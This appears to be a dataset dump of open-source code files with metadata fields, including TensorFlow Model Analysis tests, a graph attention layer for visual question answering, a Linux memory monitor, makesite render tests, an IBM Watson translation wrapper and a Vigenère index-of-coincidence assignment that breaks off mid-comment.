          raise util.BeamAssertException(err)

      util.assert_that(slice_keys_extracts, check_result)
# Standard TensorFlow test entry point.
if __name__ == '__main__':
  tf.test.main()
|
# Lint as: python3
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for slice_key_extractor."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import apache_beam as beam
from apache_beam.testing import util
import numpy as np
import tensorflow as tf
from tensorflow_model_analysis import config
from tensorflow_model_analysis import constants
from tensorflow_model_analysis import types
from tensorflow_model_analysis.eval_saved_model import testutil
from tensorflow_model_analysis.extractors import slice_key_extractor
from tensorflow_model_analysis.slicer import slicer_lib as slicer
def make_features_dict(features_dict):
result = {}
for key, value in features_dict.items():
result[key] = {'node': np.array(value)}
return result
def create_fpls():
fpl1 = types.FeaturesPredictionsLabels(
input_ref=0,
features=make_features_dict({
'gender': ['f'],
'age': [13],
'interest': ['cars']
}),
predictions=make_features_dict({
'kb': [1],
}),
labels=make_features_dict({'ad_risk_score': [0]}))
fpl2 = types.FeaturesPredictionsLabels(
input_ref=0,
features=make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
}),
predictions=make_features_dict({
'kb': [1],
}),
labels=make_features_dict({'ad_risk_score': [0]}))
return [fpl1, fpl2]
def wrap_fpl(fpl):
return {
constants.INPUT_KEY: fpl,
constants.FEATURES_PREDICTIONS_LABELS_KEY: fpl
}
class SliceTest(testutil.TensorflowModelAnalysisTest, parameterized.TestCase):
@parameterized.named_parameters(
('features_only', [''], [{
constants.FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
})
}, {
constants.FEATURES_KEY:
make_features_dict({
'gender': ['f'],
'age': [12],
'interest': ['cars']
})
}], [slicer.SingleSliceSpec(columns=['gender'])], [[(('gender', 'm'),)],
[(('gender', 'f'),)]]),
('duplicate_feature_keys', [''], [{
constants.FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
})
}, {
constants.FEATURES_KEY:
make_features_dict({
'gender': ['f'],
'age': [12],
'interest': ['cars']
})
}], [
slicer.SingleSliceSpec(columns=['gender']),
slicer.SingleSliceSpec(columns=['gender'])
], [[(('gender', 'm'),)], [(('gender', 'f'),)]]),
('transformed_features', [''], [{
constants.FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
}),
constants.TRANSFORMED_FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['boats']
})
}, {
constants.FEATURES_KEY:
make_features_dict({
'gender': ['f'],
'age': [12],
'interest': ['cars']
}),
constants.TRANSFORMED_FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['planes']
})
}], [slicer.SingleSliceSpec(columns=['interest'])
], [[(('interest', 'boats'),)], [(('interest', 'planes'),)]]),
('transformed_features_with_multiple_models', ['model1', 'model2'], [{
constants.FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
}),
constants.TRANSFORMED_FEATURES_KEY: {
'model1': make_features_dict({'interest': ['boats']}),
'model2': make_features_dict({'interest': ['planes']})
}
}, {
constants.FEATURES_KEY:
make_features_dict({
'gender': ['f'],
'age': [12],
'interest': ['planes']
}),
constants.TRANSFORMED_FEATURES_KEY: {
'model1': make_features_dict({'interest': ['trains']}),
'model2': make_features_dict({'interest': ['planes']})
}
}], [slicer.SingleSliceSpec(columns=['interest'])], [[
(('interest', 'boats'),), (('interest', 'planes'),)
], [(('interest', 'planes'),), (('interest', 'trains'),)]]),
)
def testSliceKeys(self, model_names, extracts, slice_specs, expected_slices):
eval_config = config.EvalConfig(
model_specs=[config.ModelSpec(name=name) for name in model_names])
with beam.Pipeline() as pipeline:
slice_keys_extracts = (
pipeline
| 'CreateTestInput' >> beam.Create(extracts)
| 'ExtractSlices' >> slice_key_extractor.ExtractSliceKeys(
slice_spec=slice_specs, eval_config=eval_config))
def check_result(got):
try:
self.assertLen(got, 2)
got_results = []
for item in got:
self.assertIn(constants.SLICE_KEY_TYPES_KEY, item)
got_results.append(sorted(item[constants.SLICE_KEY_TYPES_KEY]))
self.assertCountEqual(got_results, expected_slices)
except AssertionError as err:
raise util.BeamAssertException(err)
util.assert_that(slice_keys_extracts, check_result)
def testLegacySliceKeys(self):
with beam.Pipeline() as pipeline:
fpls = create_fpls()
slice_keys_extracts = (
pipeline
| 'CreateTestInput' >> beam.Create(fpls)
| 'WrapFpls' >> beam.Map(wrap_fpl)
| 'ExtractSlices' >> slice_key_extractor.ExtractSliceKeys([
slicer.SingleSliceSpec(),
slicer.SingleSliceSpec(columns=['gender'])
]))
def check_result(got):
try:
self.assertLen(got, 2)
expected_results = sorted([[(), (('gender', 'f'),)],
[(), (('gender', 'm'),)]])
got_results = []
for item in got:
self.assertIn(constants.SLICE_KEY_TYPES_KEY, item)
got_results.append(sorted(item[constants.SLICE_KEY_TYPES_KEY]))
self.assertCountEqual(got_results, expected_results)
except AssertionError as err:
raise util.BeamAssertException(err)
util.assert_that(slice_keys_extracts, check_result)
def testMaterializedLegacySliceKeys(self):
with beam.Pipeline() as pipeline:
fpls = create_fpls()
slice_keys_extracts = (
pipeline
| 'CreateTestInput' >> beam.Create(fpls)
| 'WrapFpls' >> beam.Map(wrap_fpl)
| 'ExtractSlices' >> slice_key_extractor.ExtractSliceKeys(
[
slicer.SingleSliceSpec(),
slicer.SingleSliceSpec(columns=['gender'])
],
materialize=True))
def check_result(got):
try:
self.assertLen(got, 2)
expected_results = [
types.MaterializedColumn(
name=constants.SLICE_KEYS_KEY,
value=[b'Overall', b'gender:f']),
types.MaterializedColumn(
name=constants.SLICE_KEYS_KEY,
value=[b'Overall', b'gender:m'])
]
got_results = []
for item in got:
self.assertIn(constants.SLICE_KEYS_KEY, item)
got_result = item[constants.SLICE_KEYS_KEY]
got_results.append(
got_result._replace(value=sorted(got_result.value)))
self.assertCountEqual(got_results, expected_results)
except AssertionError as err:
raise util.BeamAssertException(err)
util.assert_that(slice_keys_extracts, check_result)
if __name__ == '__main__':
tf.test.main()
|
en
| 0.833855
|
# Lint as: python3 # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Test for slice_key_extractor.
| 2.070065
| 2
|
model/graph_att_layer.py
|
Originofamonia/VQA_ReGAT
| 0
|
6628478
|
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT license.
Relation-aware Graph Attention Network for Visual Question Answering
<NAME>, <NAME>, <NAME>, <NAME>
https://arxiv.org/abs/1903.12314
This code is written by <NAME>.
"""
import torch
import torch.nn as nn
from model.fc import FCNet
import math
from torch.nn.utils.weight_norm import weight_norm
class GraphSelfAttentionLayer(nn.Module):
    """Multi-head graph self-attention over ROI features.

    Attention logits can be biased by pairwise position embeddings
    (implicit relation, pos_emb_dim > 0) and/or masked by an adjacency
    matrix plus per-edge label biases (explicit relation).
    """

    def __init__(self, feat_dim, nongt_dim=20, pos_emb_dim=-1,
                 num_heads=16, dropout=[0.2, 0.5]):
        """ Attention module with vectorized version

        Args:
            # position_embedding: [num_rois, nongt_dim, pos_emb_dim]
            # used in implicit relation
            pos_emb_dim: set as -1 if explicit relation
            nongt_dim: number of objects consider relations per image
            # fc_dim: should be same as num_heads
            feat_dim: dimension of roi_feat
            num_heads: number of attention heads
        Returns:
            output: [num_rois, ovr_feat_dim, output_dim]
        """
        super(GraphSelfAttentionLayer, self).__init__()
        # multi head
        self.fc_dim = num_heads
        self.feat_dim = feat_dim
        # (query_dim, key_dim, output_dim) -- all equal to feat_dim here.
        self.dim = (feat_dim, feat_dim, feat_dim)
        # Per-head dims; feat_dim must be divisible by num_heads or the
        # view() calls in forward() will fail.
        self.dim_group = (int(self.dim[0] / num_heads),
                          int(self.dim[1] / num_heads),
                          int(self.dim[2] / num_heads))
        self.num_heads = num_heads
        self.pos_emb_dim = pos_emb_dim
        if self.pos_emb_dim > 0:
            # Projects each pairwise position embedding to one bias per head.
            self.pair_pos_fc1 = FCNet([pos_emb_dim, self.fc_dim], None, dropout[0])
        self.query = FCNet([feat_dim, self.dim[0]], None, dropout[0])
        self.nongt_dim = nongt_dim
        self.key = FCNet([feat_dim, self.dim[1]], None, dropout[0])
        # Grouped 1x1 conv acts as a per-head output projection.
        self.linear_out_ = weight_norm(
            nn.Conv2d(in_channels=self.fc_dim * feat_dim,
                      out_channels=self.dim[2],
                      kernel_size=(1, 1),
                      groups=self.fc_dim), dim=None)

    def forward(self, roi_feat, adj_matrix,
                position_embedding, label_biases_att):
        """
        Args:
            roi_feat: [batch_size, N, feat_dim]
            adj_matrix: [batch_size, N, nongt_dim]
            position_embedding: [num_rois, nongt_dim, pos_emb_dim]
        Returns:
            output: [batch_size, num_rois, ovr_feat_dim, output_dim]
        """
        batch_size = roi_feat.size(0)
        num_rois = roi_feat.size(1)
        # Attend over at most nongt_dim neighbours per ROI.
        nongt_dim = self.nongt_dim if self.nongt_dim < num_rois else num_rois
        # [batch_size, nongt_dim, feat_dim]
        nongt_roi_feat = roi_feat[:, :nongt_dim, :]
        # [batch_size, num_rois, self.dim[0] = feat_dim]
        q_data = self.query(roi_feat)
        # [batch_size, num_rois, num_heads, feat_dim /num_heads]
        q_data_batch = q_data.view(batch_size, num_rois, self.num_heads,
                                   self.dim_group[0])
        # [batch_size, num_heads, num_rois, feat_dim /num_heads]
        q_data_batch = torch.transpose(q_data_batch, 1, 2)
        # [batch_size, nongt_dim, self.dim[1] = feat_dim]
        k_data = self.key(nongt_roi_feat)
        # [batch_size, nongt_dim, num_heads, feat_dim /num_heads]
        k_data_batch = k_data.view(batch_size, nongt_dim, self.num_heads,
                                   self.dim_group[1])
        # [batch_size, num_heads, nongt_dim, feat_dim /num_heads]
        k_data_batch = torch.transpose(k_data_batch, 1, 2)
        # Values are the raw (unprojected) neighbour features.
        # [batch_size, nongt_dim, feat_dim]
        v_data = nongt_roi_feat
        # [batch_size, num_heads, num_rois, nongt_dim]
        aff = torch.matmul(q_data_batch, torch.transpose(k_data_batch, 2, 3))
        # aff_scale, [batch_size, num_heads, num_rois, nongt_dim]
        # Scaled dot-product attention: divide by sqrt(per-head key dim).
        aff_scale = (1.0 / math.sqrt(float(self.dim_group[1]))) * aff
        # aff_scale, [batch_size, num_rois, num_heads, nongt_dim]
        aff_scale = torch.transpose(aff_scale, 1, 2)
        weighted_aff = aff_scale
        if position_embedding is not None and self.pos_emb_dim > 0:
            # Adding geometric features
            position_embedding = position_embedding.float()
            # [batch_size, num_rois * nongt_dim, emb_dim]
            position_embedding_reshape = position_embedding.view(
                (batch_size, -1, self.pos_emb_dim))
            # position_feat_1, [batch_size, num_rois * nongt_dim, fc_dim]
            position_feat_1 = self.pair_pos_fc1(position_embedding_reshape)
            position_feat_1_relu = nn.functional.relu(position_feat_1)
            # aff_weight, [batch_size, num_rois, nongt_dim, fc_dim]
            aff_weight = position_feat_1_relu.view(
                (batch_size, -1, nongt_dim, self.fc_dim))
            # aff_weight, [batch_size, num_rois, fc_dim, nongt_dim]
            aff_weight = torch.transpose(aff_weight, 2, 3)
            # NOTE(review): hard-coded .cuda() -- this layer fails on
            # CPU-only runs; consider thresh.to(aff_weight.device).
            thresh = torch.FloatTensor([1e-6]).cuda()
            # weighted_aff, [batch_size, num_rois, fc_dim, nongt_dim]
            # Clamp before log so zero position weights do not yield -inf.
            threshold_aff = torch.max(aff_weight, thresh)
            weighted_aff += torch.log(threshold_aff)
        if adj_matrix is not None:
            # weighted_aff_transposed, [batch_size, num_rois, nongt_dim, num_heads]
            weighted_aff_transposed = torch.transpose(weighted_aff, 2, 3)
            # Large negative fill so masked edges vanish after softmax.
            zero_vec = -9e15 * torch.ones_like(weighted_aff_transposed)
            adj_matrix = adj_matrix.view(
                adj_matrix.shape[0], adj_matrix.shape[1],
                adj_matrix.shape[2], 1)
            adj_matrix_expand = adj_matrix.expand(
                (-1, -1, -1,
                 weighted_aff_transposed.shape[-1]))
            weighted_aff_masked = torch.where(adj_matrix_expand > 0,
                                              weighted_aff_transposed,
                                              zero_vec)
            weighted_aff_masked = weighted_aff_masked + \
                label_biases_att.unsqueeze(3)
            weighted_aff = torch.transpose(weighted_aff_masked, 2, 3)
        # aff_softmax, [batch_size, num_rois, fc_dim, nongt_dim]
        # Normalize over the neighbour (nongt) axis.
        aff_softmax = nn.functional.softmax(weighted_aff, 3)
        # aff_softmax_reshape, [batch_size, num_rois * fc_dim, nongt_dim]
        aff_softmax_reshape = aff_softmax.view((batch_size, -1, nongt_dim))
        # output_t, [batch_size, num_rois * fc_dim, feat_dim]
        output_t = torch.matmul(aff_softmax_reshape, v_data)
        # output_t, [batch_size * num_rois, fc_dim * feat_dim, 1, 1]
        output_t = output_t.view((-1, self.fc_dim * self.feat_dim, 1, 1))
        # linear_out, [batch_size * num_rois, dim[2], 1, 1]
        linear_out = self.linear_out_(output_t)
        output = linear_out.view((batch_size, num_rois, self.dim[2]))
        return output
|
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT license.
Relation-aware Graph Attention Network for Visual Question Answering
<NAME>, <NAME>, <NAME>, <NAME>
https://arxiv.org/abs/1903.12314
This code is written by <NAME>.
"""
import torch
import torch.nn as nn
from model.fc import FCNet
import math
from torch.nn.utils.weight_norm import weight_norm
class GraphSelfAttentionLayer(nn.Module):
def __init__(self, feat_dim, nongt_dim=20, pos_emb_dim=-1,
num_heads=16, dropout=[0.2, 0.5]):
""" Attention module with vectorized version
Args:
# position_embedding: [num_rois, nongt_dim, pos_emb_dim]
# used in implicit relation
pos_emb_dim: set as -1 if explicit relation
nongt_dim: number of objects consider relations per image
# fc_dim: should be same as num_heads
feat_dim: dimension of roi_feat
num_heads: number of attention heads
Returns:
output: [num_rois, ovr_feat_dim, output_dim]
"""
super(GraphSelfAttentionLayer, self).__init__()
# multi head
self.fc_dim = num_heads
self.feat_dim = feat_dim
self.dim = (feat_dim, feat_dim, feat_dim)
self.dim_group = (int(self.dim[0] / num_heads),
int(self.dim[1] / num_heads),
int(self.dim[2] / num_heads))
self.num_heads = num_heads
self.pos_emb_dim = pos_emb_dim
if self.pos_emb_dim > 0:
self.pair_pos_fc1 = FCNet([pos_emb_dim, self.fc_dim], None, dropout[0])
self.query = FCNet([feat_dim, self.dim[0]], None, dropout[0])
self.nongt_dim = nongt_dim
self.key = FCNet([feat_dim, self.dim[1]], None, dropout[0])
self.linear_out_ = weight_norm(
nn.Conv2d(in_channels=self.fc_dim * feat_dim,
out_channels=self.dim[2],
kernel_size=(1, 1),
groups=self.fc_dim), dim=None)
def forward(self, roi_feat, adj_matrix,
position_embedding, label_biases_att):
"""
Args:
roi_feat: [batch_size, N, feat_dim]
adj_matrix: [batch_size, N, nongt_dim]
position_embedding: [num_rois, nongt_dim, pos_emb_dim]
Returns:
output: [batch_size, num_rois, ovr_feat_dim, output_dim]
"""
batch_size = roi_feat.size(0)
num_rois = roi_feat.size(1)
nongt_dim = self.nongt_dim if self.nongt_dim < num_rois else num_rois
# [batch_size, nongt_dim, feat_dim]
nongt_roi_feat = roi_feat[:, :nongt_dim, :]
# [batch_size, num_rois, self.dim[0] = feat_dim]
q_data = self.query(roi_feat)
# [batch_size, num_rois, num_heads, feat_dim /num_heads]
q_data_batch = q_data.view(batch_size, num_rois, self.num_heads,
self.dim_group[0])
# [batch_size, num_heads, num_rois, feat_dim /num_heads]
q_data_batch = torch.transpose(q_data_batch, 1, 2)
# [batch_size, nongt_dim, self.dim[1] = feat_dim]
k_data = self.key(nongt_roi_feat)
# [batch_size, nongt_dim, num_heads, feat_dim /num_heads]
k_data_batch = k_data.view(batch_size, nongt_dim, self.num_heads,
self.dim_group[1])
# [batch_size, num_heads, nongt_dim, feat_dim /num_heads]
k_data_batch = torch.transpose(k_data_batch, 1, 2)
# [batch_size, nongt_dim, feat_dim]
v_data = nongt_roi_feat
# [batch_size, num_heads, num_rois, nongt_dim]
aff = torch.matmul(q_data_batch, torch.transpose(k_data_batch, 2, 3))
# aff_scale, [batch_size, num_heads, num_rois, nongt_dim]
aff_scale = (1.0 / math.sqrt(float(self.dim_group[1]))) * aff
# aff_scale, [batch_size, num_rois, num_heads, nongt_dim]
aff_scale = torch.transpose(aff_scale, 1, 2)
weighted_aff = aff_scale
if position_embedding is not None and self.pos_emb_dim > 0:
# Adding geometric features
position_embedding = position_embedding.float()
# [batch_size, num_rois * nongt_dim, emb_dim]
position_embedding_reshape = position_embedding.view(
(batch_size, -1, self.pos_emb_dim))
# position_feat_1, [batch_size, num_rois * nongt_dim, fc_dim]
position_feat_1 = self.pair_pos_fc1(position_embedding_reshape)
position_feat_1_relu = nn.functional.relu(position_feat_1)
# aff_weight, [batch_size, num_rois, nongt_dim, fc_dim]
aff_weight = position_feat_1_relu.view(
(batch_size, -1, nongt_dim, self.fc_dim))
# aff_weight, [batch_size, num_rois, fc_dim, nongt_dim]
aff_weight = torch.transpose(aff_weight, 2, 3)
thresh = torch.FloatTensor([1e-6]).cuda()
# weighted_aff, [batch_size, num_rois, fc_dim, nongt_dim]
threshold_aff = torch.max(aff_weight, thresh)
weighted_aff += torch.log(threshold_aff)
if adj_matrix is not None:
# weighted_aff_transposed, [batch_size, num_rois, nongt_dim, num_heads]
weighted_aff_transposed = torch.transpose(weighted_aff, 2, 3)
zero_vec = -9e15 * torch.ones_like(weighted_aff_transposed)
adj_matrix = adj_matrix.view(
adj_matrix.shape[0], adj_matrix.shape[1],
adj_matrix.shape[2], 1)
adj_matrix_expand = adj_matrix.expand(
(-1, -1, -1,
weighted_aff_transposed.shape[-1]))
weighted_aff_masked = torch.where(adj_matrix_expand > 0,
weighted_aff_transposed,
zero_vec)
weighted_aff_masked = weighted_aff_masked + \
label_biases_att.unsqueeze(3)
weighted_aff = torch.transpose(weighted_aff_masked, 2, 3)
# aff_softmax, [batch_size, num_rois, fc_dim, nongt_dim]
aff_softmax = nn.functional.softmax(weighted_aff, 3)
# aff_softmax_reshape, [batch_size, num_rois * fc_dim, nongt_dim]
aff_softmax_reshape = aff_softmax.view((batch_size, -1, nongt_dim))
# output_t, [batch_size, num_rois * fc_dim, feat_dim]
output_t = torch.matmul(aff_softmax_reshape, v_data)
# output_t, [batch_size * num_rois, fc_dim * feat_dim, 1, 1]
output_t = output_t.view((-1, self.fc_dim * self.feat_dim, 1, 1))
# linear_out, [batch_size * num_rois, dim[2], 1, 1]
linear_out = self.linear_out_(output_t)
output = linear_out.view((batch_size, num_rois, self.dim[2]))
return output
|
en
| 0.497053
|
Copyright (c) Microsoft Corporation. Licensed under the MIT license. Relation-aware Graph Attention Network for Visual Question Answering <NAME>, <NAME>, <NAME>, <NAME> https://arxiv.org/abs/1903.12314 This code is written by <NAME>. Attention module with vectorized version Args: # position_embedding: [num_rois, nongt_dim, pos_emb_dim] # used in implicit relation pos_emb_dim: set as -1 if explicit relation nongt_dim: number of objects consider relations per image # fc_dim: should be same as num_heads feat_dim: dimension of roi_feat num_heads: number of attention heads Returns: output: [num_rois, ovr_feat_dim, output_dim] # multi head Args: roi_feat: [batch_size, N, feat_dim] adj_matrix: [batch_size, N, nongt_dim] position_embedding: [num_rois, nongt_dim, pos_emb_dim] Returns: output: [batch_size, num_rois, ovr_feat_dim, output_dim] # [batch_size, nongt_dim, feat_dim] # [batch_size, num_rois, self.dim[0] = feat_dim] # [batch_size, num_rois, num_heads, feat_dim /num_heads] # [batch_size, num_heads, num_rois, feat_dim /num_heads] # [batch_size, nongt_dim, self.dim[1] = feat_dim] # [batch_size, nongt_dim, num_heads, feat_dim /num_heads] # [batch_size, num_heads, nongt_dim, feat_dim /num_heads] # [batch_size, nongt_dim, feat_dim] # [batch_size, num_heads, num_rois, nongt_dim] # aff_scale, [batch_size, num_heads, num_rois, nongt_dim] # aff_scale, [batch_size, num_rois, num_heads, nongt_dim] # Adding geometric features # [batch_size, num_rois * nongt_dim, emb_dim] # position_feat_1, [batch_size, num_rois * nongt_dim, fc_dim] # aff_weight, [batch_size, num_rois, nongt_dim, fc_dim] # aff_weight, [batch_size, num_rois, fc_dim, nongt_dim] # weighted_aff, [batch_size, num_rois, fc_dim, nongt_dim] # weighted_aff_transposed, [batch_size, num_rois, nongt_dim, num_heads] # aff_softmax, [batch_size, num_rois, fc_dim, nongt_dim] # aff_softmax_reshape, [batch_size, num_rois * fc_dim, nongt_dim] # output_t, [batch_size, num_rois * fc_dim, feat_dim] # output_t, [batch_size * num_rois, 
fc_dim * feat_dim, 1, 1] # linear_out, [batch_size * num_rois, dim[2], 1, 1]
| 2.486784
| 2
|
Memory/Main.py
|
selboo/Linux-Monitor
| 5
|
6628479
|
#!/usr/bin/env python
#coding=utf8
from func import *
def Memory_Get_Info():
    """Parse /proc/meminfo (via Read_Proc) into a {field: kB_value} dict."""
    info = {}
    for line in Read_Proc('meminfo'):
        fields = line.split()
        # 'MemTotal:' -> 'MemTotal'; the value column is an integer in kB.
        info[fields[0][0:-1]] = int(fields[1])
    return info
def Memory(data):
    """Attach memory/swap usage figures (formatted via Bytes()) to *data*.

    Args:
        data: dict to augment; a 'memory' sub-dict is added in place.

    Returns:
        The same *data* dict, for chaining.
    """
    # Renamed from `Memory` -- the original local shadowed this function's
    # own name, which is confusing and error-prone.
    meminfo = Memory_Get_Info()

    mem_total = meminfo['MemTotal']
    buffers = meminfo['Buffers']
    cached = meminfo['Cached']
    swap_total = meminfo['SwapTotal']
    # "Used" excludes buffers/cache, matching classic `free` accounting.
    mem_usage = mem_total - meminfo['MemFree'] - buffers - cached
    swap_usage = swap_total - meminfo['SwapFree']

    data['memory'] = {
        'MemTotal': Bytes(mem_total),
        'MemUsage': Bytes(mem_usage),
        'MemBuffers': Bytes(buffers),
        'MemCached': Bytes(cached),
        'SwapTotal': Bytes(swap_total),
        'SwapUsage': Bytes(swap_usage),
    }
    return data
|
#!/usr/bin/env python
#coding=utf8
from func import *
def Memory_Get_Info():
Proc_MemInfo = Read_Proc('meminfo')
Dick_MemInfo = {}
for i in Proc_MemInfo:
Dick_MemInfo[i.split()[0][0:-1]] = int(i.split()[1])
return Dick_MemInfo
def Memory(data):
    """Add human-readable memory/swap statistics under data['memory'].

    Args:
        data: result dict shared by the monitor; mutated in place.

    Returns:
        The same ``data`` dict with a ``'memory'`` entry added.
    """
    # Use a distinct local name: the original shadowed this function with a
    # local variable that was also called "Memory".
    meminfo = Memory_Get_Info()
    # "Used" memory conventionally excludes buffers and page cache.
    mem_usage = (meminfo['MemTotal'] - meminfo['MemFree']
                 - meminfo['Buffers'] - meminfo['Cached'])
    swap_usage = meminfo['SwapTotal'] - meminfo['SwapFree']
    data['memory'] = {
        'MemTotal': Bytes(meminfo['MemTotal']),
        'MemUsage': Bytes(mem_usage),
        'MemBuffers': Bytes(meminfo['Buffers']),
        'MemCached': Bytes(meminfo['Cached']),
        'SwapTotal': Bytes(meminfo['SwapTotal']),
        'SwapUsage': Bytes(swap_usage),
    }
    return data
|
ru
| 0.166716
|
#!/usr/bin/env python #coding=utf8
| 2.887295
| 3
|
test/test_render.py
|
tekknolagi/makesite-demo
| 1,744
|
6628480
|
import unittest
import makesite
class RenderTest(unittest.TestCase):
    """Tests for render() function."""

    def test_oneline_template(self):
        # Two distinct placeholders on one line.
        rendered = makesite.render('foo {{ key1 }} baz {{ key2 }}',
                                   key1='bar', key2='qux')
        self.assertEqual(rendered, 'foo bar baz qux')

    def test_multiline_template(self):
        # The same placeholder may appear on different lines.
        rendered = makesite.render('foo {{ key1 }}\nbaz {{ key1 }}', key1='bar')
        self.assertEqual(rendered, 'foo bar\nbaz bar')

    def test_repeated_key(self):
        # One key substituted everywhere it occurs.
        rendered = makesite.render('foo {{ key1 }} baz {{ key1 }}', key1='bar')
        self.assertEqual(rendered, 'foo bar baz bar')

    def test_multiline_placeholder(self):
        # Placeholder delimiters themselves may span lines.
        rendered = makesite.render('foo {{\nkey1\n}} baz {{\nkey2\n}}',
                                   key1='bar', key2='qux')
        self.assertEqual(rendered, 'foo bar baz qux')
|
import unittest
import makesite
class RenderTest(unittest.TestCase):
    """Tests for render() function."""

    def test_oneline_template(self):
        # Two distinct placeholders on one line.
        rendered = makesite.render('foo {{ key1 }} baz {{ key2 }}',
                                   key1='bar', key2='qux')
        self.assertEqual(rendered, 'foo bar baz qux')

    def test_multiline_template(self):
        # The same placeholder may appear on different lines.
        rendered = makesite.render('foo {{ key1 }}\nbaz {{ key1 }}', key1='bar')
        self.assertEqual(rendered, 'foo bar\nbaz bar')

    def test_repeated_key(self):
        # One key substituted everywhere it occurs.
        rendered = makesite.render('foo {{ key1 }} baz {{ key1 }}', key1='bar')
        self.assertEqual(rendered, 'foo bar baz bar')

    def test_multiline_placeholder(self):
        # Placeholder delimiters themselves may span lines.
        rendered = makesite.render('foo {{\nkey1\n}} baz {{\nkey2\n}}',
                                   key1='bar', key2='qux')
        self.assertEqual(rendered, 'foo bar baz qux')
|
en
| 0.693953
|
Tests for render() function.
| 3.286943
| 3
|
final_project/languagetr.py
|
SV1997/xzceb-flask_eng_fr
| 0
|
6628481
|
<gh_stars>0
'''This module provides an English/French translation service backed by the
IBM Watson Language Translator API.'''
from ibm_watson import LanguageTranslatorV3
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
# NOTE(review): the API key is hard-coded; consider loading it from the
# environment instead of committing credentials to source control.
APIKEY="<KEY>"
URL='''https://api.eu-gb.language-translator.watson.cloud.ibm.com/instances/a70261ee-0e59-4e9e-b460-3b7b0380c985'''
# A single module-level Watson client is shared by en2fr()/fr2en() below.
authenticator=IAMAuthenticator(APIKEY)
translator=LanguageTranslatorV3(version='2018-05-01',authenticator=authenticator)
translator.set_service_url(URL)
def _translate(mess, model_id):
    """Send one string to the shared Watson client and return the translation.

    Args:
        mess: text to translate.
        model_id: Watson translation model, e.g. 'en-fr' or 'fr-en'.
    """
    result = translator.translate(text=[mess], model_id=model_id).get_result()
    return result['translations'][0]['translation']

def en2fr(mess):
    '''
    This function translates English to French.
    '''
    return _translate(mess, 'en-fr')

def fr2en(mess):
    '''
    This function translates French to English.
    '''
    return _translate(mess, 'fr-en')
# text=input("enter text: ")
# C=en2fr('Hello')
# print(type(C))
# C=str(C)
# fr2en(C)
|
'''This module provides an English/French translation service backed by the
IBM Watson Language Translator API.'''
from ibm_watson import LanguageTranslatorV3
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
# NOTE(review): the API key is hard-coded; consider loading it from the
# environment instead of committing credentials to source control.
APIKEY="<KEY>"
URL='''https://api.eu-gb.language-translator.watson.cloud.ibm.com/instances/a70261ee-0e59-4e9e-b460-3b7b0380c985'''
# A single module-level Watson client is shared by en2fr()/fr2en() below.
authenticator=IAMAuthenticator(APIKEY)
translator=LanguageTranslatorV3(version='2018-05-01',authenticator=authenticator)
translator.set_service_url(URL)
def _translate(mess, model_id):
    """Send one string to the shared Watson client and return the translation.

    Args:
        mess: text to translate.
        model_id: Watson translation model, e.g. 'en-fr' or 'fr-en'.
    """
    result = translator.translate(text=[mess], model_id=model_id).get_result()
    return result['translations'][0]['translation']

def en2fr(mess):
    '''
    This function translates English to French.
    '''
    return _translate(mess, 'en-fr')

def fr2en(mess):
    '''
    This function translates French to English.
    '''
    return _translate(mess, 'fr-en')
# text=input("enter text: ")
# C=en2fr('Hello')
# print(type(C))
# C=str(C)
# fr2en(C)
|
en
| 0.321213
|
this module provide translation service https://api.eu-gb.language-translator.watson.cloud.ibm.com/instances/a70261ee-0e59-4e9e-b460-3b7b0380c985 This function translate english to french # mess=input("enter text: ") This function translate french to english # mess = input("enter text: ") # text=input("enter text: ") # C=en2fr('Hello') # print(type(C)) # C=str(C) # fr2en(C)
| 3.354475
| 3
|
Assignment 7 solution code/vigenereIC.py
|
RitvikKhanna/AntiKasiskiExamination
| 1
|
6628482
|
# Assignment 7 - Question 2,3,4 (Combined)
# Submitted By: <NAME> & <NAME>
# 1479093 & 1505703
# The line of the code
# list1 = sorted(list1, key=lambda x: x[1],reverse = True) was taken from stackoverflow - https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value
import math,sys,random
LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def main():
    # Smoke test: print the IC and the ranked key lengths for a known
    # Vigenere ciphertext.
    sample = 'PPQCAXQVEKGYBNKMAZUHKNHONMFRAZCBELGRKUGDDMA'
    print(stringIC(sample))
    print(keylengthIC(sample))
# *** Question - 2 *** #
def stringIC(message):
    # Returns the index of coincidence for a string:
    #     IC = sum(c * (c - 1)) / (N * (N - 1))
    # where c is the count of each distinct symbol and N = len(message).
    from collections import Counter

    # Counting every distinct symbol once is O(N); the previous version
    # re-scanned the whole message for every character, which was O(N^2).
    counts = Counter(message)
    numerator = sum(c * (c - 1) for c in counts.values())
    denominator = len(message) * (len(message) - 1)
    return numerator / denominator
# *** Question - 3 *** #
def subseqIC(ciphertext, keylen):
    # Average index of coincidence over the keylen substrings built by
    # taking every keylen-th letter of the ciphertext.
    #
    # Fix: getNthSubkeysLetters() expects a 1-based position, but the old
